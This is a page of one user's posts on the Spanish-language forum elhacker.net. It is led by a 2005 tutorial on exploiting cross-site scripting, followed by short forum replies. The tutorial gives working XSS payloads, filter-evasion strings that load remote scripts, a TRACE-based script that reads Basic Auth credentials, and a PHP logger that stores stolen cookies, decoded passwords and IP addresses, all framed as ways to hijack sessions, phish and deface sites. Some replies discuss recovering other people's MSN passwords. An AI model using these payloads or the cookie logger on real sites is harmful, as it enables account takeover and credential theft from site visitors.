elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 ... 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 [180] 181
1791  Informática / Tutoriales - Documentación / Los Poderes Secretos de XSS (Cross Site Scripting) en: 9 Diciembre 2005, 05:02 am
Los Poderes Secretos de XSS por
.


XSS aka Cross Site Scripting es el ataque basado en la explotacion de vulnerabilidades de el sistema de validación de HTML incrustado.
El problema es que normalmente no se valida correctamente, esta vulnerabilidad puede estar de forma directa (foros, mensajes de error, etc..) o indirecta (redirecciones, framesets, etc..)
cada una se trata de forma diferente:

TipoManejo
DirectaEste tipo de XSS, es el que normalmente es censurado, asi que es muy poco comun que puedas usar tags como <script o <iframe, sinembargo nunca es malo probar, para ver formas de pasar estas protecciones, debes de saber mas de HTML que el creador del sitio
IndirectaEsta es un tipo de vulnerabilidad, muy comun, y muy poco explotada, consiste en modificar valores que la aplicacion web utiliza para pasar variables entre 2 paginas, sin usar sesiones.

Indirecta
Explicare primero la Indirecta, ya que es la menos censurada.
Esta sucede cuando hay un mensaje o una ruta en la URL del navegador o en la cookie.
para saber el contenido de una cookie, sin usar ningun tipo de iecv o addin para tu navegador, puedes usar el siguiente script, solo colocalo en la barra de direcciones, y presiona Enter.
Código:
javascript:void(document.cookie=prompt("Modifica el valor de la cookie",document.cookie).split(";"));
una vez dentro podras modificar la cookie a tu antojo, si pones cancelar la cookie se borrará.
ahora, que podemos ver con este ejemplo?
que podemos meter comandos javascript solo modificando una URL, como puedes aventajarte de esto?

Usando FrameSets
bien, regresemos al ejemplo de el frameset, que segun la pagina que coloques te crea un frame a esa pagina.
que pasara si pones, en esa URL
Código:
javascript:while(1)alert("Te estoy floodeando");
y el link, lo pones en un foro, un navegador incauto, va a verlo y dira, bueno, es del mismo dominio, no puede ser nada malo.. y de resultado tendra un loop infinito.

Ahora, hasta ahi llegan los newbies, pero vamos a evolucionar un poco, ahora, que tal que pones un script que tome tu cookie, y mande un mp a el administrador, o incluso, que borre todos tus post en X foro, todo esto es posible.. y solo necesita un poco de imaginación.
Ahora lo que va.. el robo de cookies, es lo mas basico, y tiene como objetivo robar la cookie.. me diran, y eso de que sirve? tengo el PHPSESSID, y si el usuario ciera sesion no me servira de nada.
tienes razon, pero por ejemplo, con el uso de la libreria cURL un usuario malintencionado, podria al recibir tu cookie, entrar a la pagina, y dejarla en cache, para que el atacante cuando quiera, pueda entrar como tu, sin siquiera necesitar tu password.. esto va cobrando seriedad no?
ahora que mas?
Otro uso comun para estas vulnerabilidades es lograr hacer phishing, o colocar un Xploit..
tu ves la barra de direcciones, y ves que estas en una pagina, pero realmente estas en otra.. metes tu pass, y ya valiste.
Pero lo que me gusta mas, son los sitios de descarga, que colocan en la misma url, el sitio de objetivo.. esas paginas, son vulnerables a ataques XSS indirectos directos xD
osea, puedes colocar una imagen con link al sitio malicioso, y se ejecuta, sin que el usuario lo sepa.
Incluso PODIAS borrar un post en phpBB, o hacerte admin (era posible, no me molesten, claro que si), con este tipo de vulnerabilidad.
Ahora, vamos al siguiente tipo indirecto.

Mensaje personalizado
Estas, son forsosamente para links, no funciona en imagenes (al menos no he visto ninguna que sirva.) y va en esta forma:
Código:
error.php?error=Usuario%20Invalido
esa pagina, es vulnerable a XSS Indirecto.
con esto puedes meter casi lo que sea ahi dentro.
un <script> que te cree otra sesion bajo otro usuario, y tu sesion actual la mande a el atacante (es lo que explicaba de cURL hace un momento), o lo que sea.. aqui hay muy pocas limitantes.
Voy a explicar como puedes modificar TODA la pagina, osea todo su aspecto, con una vunerabilidad como esta.
con este codigo, se borra todo el contenido de la pagina, y escribe otra cosa:
Código:
<script>
document.documentElement.innerHTML="DEFACED";
</script>
muy complicado?
esto tiene muchos usos potenciales..

Directa
Esta es la mas divertida, y es cuando en por ejemplo.. un foro como este puedo meter un tag, y ejecutar un codigo, que pueda hacer casi lo mismo, o lo mismo que el Indirecto de Mensaje.
Funciona localizando puntos debiles en la programación de los filtros, asi que si por ejemplo, logran quitar los <iframe, <script etc.. siempre puedes poner un <div malicioso, o incluso un <u> o <s>, etc.. tags que casi siempre estan permitidos.
Esto pone los pelos de punta a muchos webmasters, afortunadamente, muchos no saben del "lado obscuro" de HTML + IExplorer :)
colocare una sección del CheatSheet de RSnake (http://ha.ckers.org/xss.html)
Citar
Código:
Embedded tab to break up the cross site scripting attack: <IMG SRC="jav ascript:alert('XSS');">
Código:
Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
Código:
Spaces and meta chars before the javascript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word "javascript:" -which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal):
<IMG SRC=" &#14; javascript:alert('XSS');">
Código:
Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes any non-alpha-non-digit is a non-valid after an HTML and therefor considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "<SCRIPT\s" != "<SCRIPT&XSS\s":
<SCRIPT&XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Código:
INPUT image:
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
Entre muchos otros, les recomiendo, que cuando busquen vulnerabilidades XSS, entren a esa página muy buena recopilación., voy a profundizar en ún tipo de esos ataques.
Código:
<BR SIZE="&{alert('XSS')}">
<FK STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
usar Style es increiblemente facil de usar, y muchos filtros son vulnerables.
quien se va a imaginar que puedes meter cosas en este!! pues ya ven.. si puedes :)
logicamente no vas a meter todo en el espacio que tienes, puedes usar:
Código:
eval(this.fu)
y en el div, agregar un campo "fu" con el codigo
<div fu="alert('Hola');" STYLE="background-image: url(javascript:eval(this.fu))">

AJAXSS
Este es un tipo de XSS no tan conocido, pero peligroso.
se basa en usar cualquier tipo de vulnerabilidad para introducir un objeto XMLHTTP y desde ahi enviar contenido POST, GET, etc.. automaticamente, sin conocimeinto del usuario, un Bug de XSS, usando esta tecnica en MySpace de MSN, permitio que una persona, lograra tener mucha fama (y es que pudo haber hecho cosas malas, afortunadamente solo hizo esto)
El potencial de este tipo de ataque es infinitamente alto, asi que "Be scared", porque parece ser que tiene un futuro prometedor.

El siguiente script obtiene el valor de las cabezeras de autenticacion de un sistema basado en Basic Auth. solo habria que decodificarlo, pero es mas facil mandarlo codificado a tu log de contraseñas, la codificacion es base64.

Código:
var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
xmlhttp.open("TRACE","./",false);
xmlhttp.send();
str1=xmlhttp.responseText;
splitString = str1.split("Authorization: Basic ");
str2=splitString[1];
str3=str2.split("Cache");
alert(str3);

log.php para registrar cookies
Código:
<?php
$archivo = fopen('log2.htm','a');

$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;
$fecha=date("j F, Y, g:i a");

fwrite($archivo, '
USUARIO Y PASSWORD: '.base64_decode($usuario).'
Cookie: '.$cookie.'
Pagina: '.$re.'
 IP: ' .$ip. '
 Fecha y Hora: ' .$fecha. '</hr>');

fclose($archivo);
?>

Links
  • Anexo(ADB.htm) -Codificador URL, UTF-8 y de Entidades HTML
  • Anexo(EUU.htm) -Codificador Hexadecimal, Decimal, Binario
  • Anexo(b64.htm) -Codificador y decodificador de Base64 y Radix64
  • http://ha.ckers.org/xss.html -Gran recopilatorio de ataques XSS comunes

Citar
(c) Sirdarckcat 2005
Autorizo la reproduccion total o parcial de este documento de acuerdo con la licencia de documentación libre de GNU, una copia puede ser encontrada en http://www.gnu.org/
1792  Seguridad Informática / Hacking / Re: COMO DECODIFICAR CÓDIGO Hexadecimal en: 29 Noviembre 2005, 02:43 am
parece que ellos quieren ver como se almacena, pero digo yo, que tal si se necesita descifrar para enviarla.. ahi es donde quiero ver que onda, pero por lo que he estado viendo.. creo que se cifra aun peor en el envio, asi que creo que no se puede hacer lo que dije :(,seguireintentando,.

Saludos
1793  Seguridad Informática / Hacking / Re: COMO DECODIFICAR CÓDIGO Hexadecimal en: 28 Noviembre 2005, 18:54 pm
Alguien ha intentado analizar la info que se manda cuando inicias sesion, alomejor no se cifra en el envio, no lo se, pero lo intentare hoy en la tarde
o cambias la contraseña con la sesion iniciada desde passport.net, y si no se puede, la pregunta secreta, y de ahi, la contraseña.

Ahora, que el codigo "binario", como dicen es hexadecimal, pero no se que es esa H.

Saludos
1794  Seguridad Informática / Bugs y Exploits / Re: Problema con Cygwin en: 25 Noviembre 2005, 01:13 am
Con que compilador lo estas tratando de hacer, y seria bueno que pusieras el codigo que intentas :D
1795  Programación / Ingeniería Inversa / Re: crackear paswor de archivos .ple (msn plus) en: 7 Noviembre 2005, 04:33 am
yuso, no encontre ninguno en internet.. voy a ver si puedo ver como funciona, y hacerlo..

PD.
gracias por tu aportacion omar..
1796  Media / Diseño Gráfico / Re: Imagen GIF en: 5 Noviembre 2005, 00:47 am
con macromedia flash se puede, y quedan muy bien.. en publich settings palomea GIF, y cerifica que este selecionado animated en su pestaña.

Saludos
1797  Seguridad Informática / Bugs y Exploits / Re: probando un bucle infinito... en: 5 Noviembre 2005, 00:21 am
sigue sin ser bucle.. siendo de el, o de ckers.org solo es una imagen extremadamente grande.

**editado
donde esta el c&p? en la url? esta pagina solo es concida por su sección de XSS.. y esto es una vulnerbilidad, tambien llamada bug.. aunque se equivoco al decirle bucle.. esta sección es para discutir nuevos bugs shellcodes etc.. realmente no sirve de nada, pero sigue siendo bug..
1798  Seguridad Informática / Bugs y Exploits / Re: probando un bucle infinito... en: 4 Noviembre 2005, 23:28 pm
Citar
me decidi a probar un bucle infinito en mi PC con IE SP2 y Firefox 1.0.7 y quisiera que me dieran su opinion al respecto...
pero si no es un bucle..
1799  Seguridad Informática / Nivel Web / Re: Nuevo bug en los phpbb<=2.0.17 en: 4 Noviembre 2005, 23:02 pm
esto mas que vulnerabilidad de phpBB es vulnerabilidad de internet explorer.. que aunque phpBB tiene la culpa por no fijarse si es una imagen.. internet explorer es el que permite ejecutar el codigo... que aunque no lo ejecuta activamente lo ejecuta pasivamente, yo no me habia fijado en este detalle, y pensaba que no funcionaba este mendigo bug.. pero al parecer si hace el intento que es mas que suficiente.
1800  Seguridad Informática / Hacking / Re: Combinaciones numericas en: 4 Noviembre 2005, 05:10 am
Acabas de confesar..
puedes usar la libreria curl de un servidor php, asi este guarda todos los archivos y la maquina comprometida es la del servidor y no la tuya, pero pues.. estoy seguro que cuando hagas eso te va a bannear el servidor como a los 100 registros a los que entres. mucha suerte.
Páginas: 1 ... 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 [180] 181
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines